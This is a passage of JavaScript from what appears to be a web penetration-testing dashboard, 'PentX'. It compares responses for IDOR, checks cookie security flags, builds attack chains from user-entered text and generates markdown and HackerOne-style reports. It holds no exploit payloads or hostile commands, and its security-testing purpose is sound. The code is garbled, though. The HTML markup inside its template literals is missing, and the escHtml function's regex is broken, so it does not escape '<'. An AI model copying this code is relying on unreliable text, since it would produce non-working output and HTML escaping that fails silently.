⚠ POTENTIAL IDOR — ${sharedData.length}/${aKeys.length} fields match. Shared fields: ${sharedData.join(', ')}
`; return; } } out.innerHTML = `
✓ Responses differ — access control appears to be working on this endpoint.
Continue testing other endpoints.
`; } } function analyzeCookie(val) { const cookie = val || document.getElementById('cookie-input').value.trim(); const out = document.getElementById('cookie-result'); if(!cookie){ out.innerHTML=''; return; } const flags = { secure: /;\s*Secure/i.test(cookie), httponly: /;\s*HttpOnly/i.test(cookie), samesite: /;\s*SameSite=(Strict|Lax|None)/i.exec(cookie), domain: /;\s*Domain=([^;]+)/i.exec(cookie), path: /;\s*Path=([^;]+)/i.exec(cookie), expires: /;\s*Expires=([^;]+)/i.exec(cookie), maxage: /;\s*Max-Age=(\d+)/i.exec(cookie), }; const issues = []; if(!flags.secure) issues.push({sev:'high',msg:'Missing Secure flag — cookie sent over HTTP'}); if(!flags.httponly) issues.push({sev:'high',msg:'Missing HttpOnly flag — accessible via document.cookie (XSS risk)'}); if(!flags.samesite) issues.push({sev:'medium',msg:'Missing SameSite flag — CSRF risk'}); if(flags.samesite && flags.samesite[1]==='None' && !flags.secure) issues.push({sev:'critical',msg:'SameSite=None without Secure — rejected by modern browsers'}); const ok = []; if(flags.secure) ok.push('Secure ✓'); if(flags.httponly) ok.push('HttpOnly ✓'); if(flags.samesite) ok.push('SameSite='+flags.samesite[1]+' ✓'); out.innerHTML = `
${ok.length?`
${ok.join(' ')}
`:''} ${issues.map(i=>`
${i.sev} ${i.msg}
`).join('')} ${!issues.length?'
✓ Cookie security flags look good.
':''}
`; } // ===== ATTACK CHAINS ===== function renderChains() { const list = document.getElementById('chains-list'); list.innerHTML = [...state.attackChains, ...state.customChains].map((c,i)=>`
${c.title}
${c.severity}
${c.desc}
${c.steps.map((s,j)=>`
STEP ${j+1}
${s}
${j
':''} `).join('')}
💰 Estimated Combined Bounty: ${c.bounty}
`).join(''); } let chainStepCount = 1; function addChainStep() { chainStepCount++; const builder = document.getElementById('chain-steps-builder'); const div = document.createElement('div'); div.className = 'input-group'; div.innerHTML = ``; builder.appendChild(div); } function buildChain() { const name = document.getElementById('chain-name').value.trim(); const steps = [...document.querySelectorAll('.chain-step-input')].map(i=>i.value.trim()).filter(Boolean); if(!name||steps.length<2){ alert('Enter a name and at least 2 steps.'); return; } state.customChains.push({title:name,severity:'high',bounty:'Custom',steps,desc:'Custom attack chain built with PentX.'}); renderChains(); document.getElementById('chain-name').value=''; document.querySelectorAll('.chain-step-input').forEach((el,i)=>{ if(i>0) el.parentElement.remove(); else el.value=''; }); chainStepCount=1; document.getElementById('custom-chain-output').innerHTML = `
✓ Chain added successfully.
`; } // ===== REPORT ===== function updateReportCVSS(findings) { const cvss = document.getElementById('cvss-summary'); if(!findings.length){ cvss.innerHTML='
No findings to score.
'; return; } const scores = {critical:9.0,high:7.5,medium:5.0,low:3.0,info:0.5}; cvss.innerHTML = findings.filter(Boolean).map(f=>`
${f.title.slice(0,20)}...
${scores[f.sev]||0}
`).join(''); } function generateReport() { const title = document.getElementById('rpt-title').value || 'Security Assessment Report'; const org = document.getElementById('rpt-org').value || 'Target Organization'; const researcher = document.getElementById('rpt-researcher').value || 'Anonymous Researcher'; const fmt = document.getElementById('rpt-format').value; const date = new Date().toISOString().split('T')[0]; const findings = state.findings.filter(Boolean); const critical = findings.filter(f=>f.sev==='critical'); const high = findings.filter(f=>f.sev==='high'); const medium = findings.filter(f=>f.sev==='medium'); const low = findings.filter(f=>f.sev==='low'||f.sev==='info'); const cvssMap = {critical:9.1,high:7.5,medium:5.3,low:3.1,info:0.5}; let report = `# ${title} **Organization:** ${org} **Researcher:** ${researcher} **Date:** ${date} **Platform:** ${fmt} **Tool:** PentX v1.0 — VaultOcean --- ## Executive Summary This security assessment identified **${findings.length} vulnerabilities** across scanned targets. | Severity | Count | |----------|-------| | 🔴 Critical | ${critical.length} | | 🟠 High | ${high.length} | | 🟡 Medium | ${medium.length} | | 🔵 Low/Info | ${low.length} | | **Total** | **${findings.length}** | ${critical.length > 0 ? `⚠️ **CRITICAL RISK**: ${critical.length} critical severity findings require immediate attention.` : ''} --- ## Detailed Findings `; findings.forEach((f,i) => { report += `### Finding ${i+1}: ${f.title} **Severity:** ${f.sev.toUpperCase()} **CVSS Score:** ${cvssMap[f.sev]||0} **Confidence:** ${f.confidence}% **Bounty Estimate:** ${f.bounty} **Module:** ${f.module} **Description:** ${f.desc} **Verification Steps:** ${f.verify} **Remediation:** Implement industry standard security controls for ${f.title.toLowerCase()}. Consult OWASP guidelines for detailed remediation steps. --- `; }); report += `## Remediation Priority 1. Fix all CRITICAL findings immediately 2. Address HIGH findings within 7 days 3. Schedule MEDIUM fixes in next sprint 4. Log LOW/INFO for future review --- *Generated by PentX v1.0 — VaultOcean Recon Platform* *Report Date: ${date}* `; document.getElementById('report-preview').textContent = report; window._reportContent = report; } function downloadReport() { if(!window._reportContent){ generateReport(); } const blob = new Blob([window._reportContent], {type:'text/markdown'}); const a = document.createElement('a'); a.href = URL.createObjectURL(blob); a.download = 'pentx-report-' + new Date().toISOString().split('T')[0] + '.md'; a.click(); } function copyReport() { if(!window._reportContent){ generateReport(); } navigator.clipboard.writeText(window._reportContent).then(()=>alert('Report copied to clipboard!')); } function copyHackerOne() { const findings = state.findings.filter(Boolean); if(!findings.length){ alert('No findings to export. Run a scan first.'); return; } const f = findings[0]; const h1 = `**Vulnerability:** ${f.title} **Severity:** ${f.sev.toUpperCase()} **Description:** ${f.desc} **Steps to Reproduce:** ${f.verify} **Impact:** ${f.desc} **Recommended Fix:** Implement standard security controls for this vulnerability type per OWASP guidelines. **Supporting Materials:** [Attach screenshots from Burp Suite / browser DevTools]`; navigator.clipboard.writeText(h1).then(()=>alert('HackerOne template copied!')); } // ===== HELPERS ===== function ri(a,b){ return Math.floor(Math.random()*(b-a+1))+a; } function getExpiry(d){ return d; } function escHtml(s){ return s.replace(/&/g,'&').replace(//g,'>'); } // ===== INIT ===== renderModules(); renderOWASP(); renderChains(); renderIDORChecklist(); // Animate stats on load setTimeout(()=>{ const el = document.getElementById('stat-scans'); if(el) el.style.transition='all 0.5s'; },100); // Clock tick setInterval(()=>{ const dot = document.querySelector('.status-dot'); if(dot){ dot.style.opacity = (parseFloat(dot.style.opacity)||1) > 0.5 ? '0.5' : '1'; } }, 1000);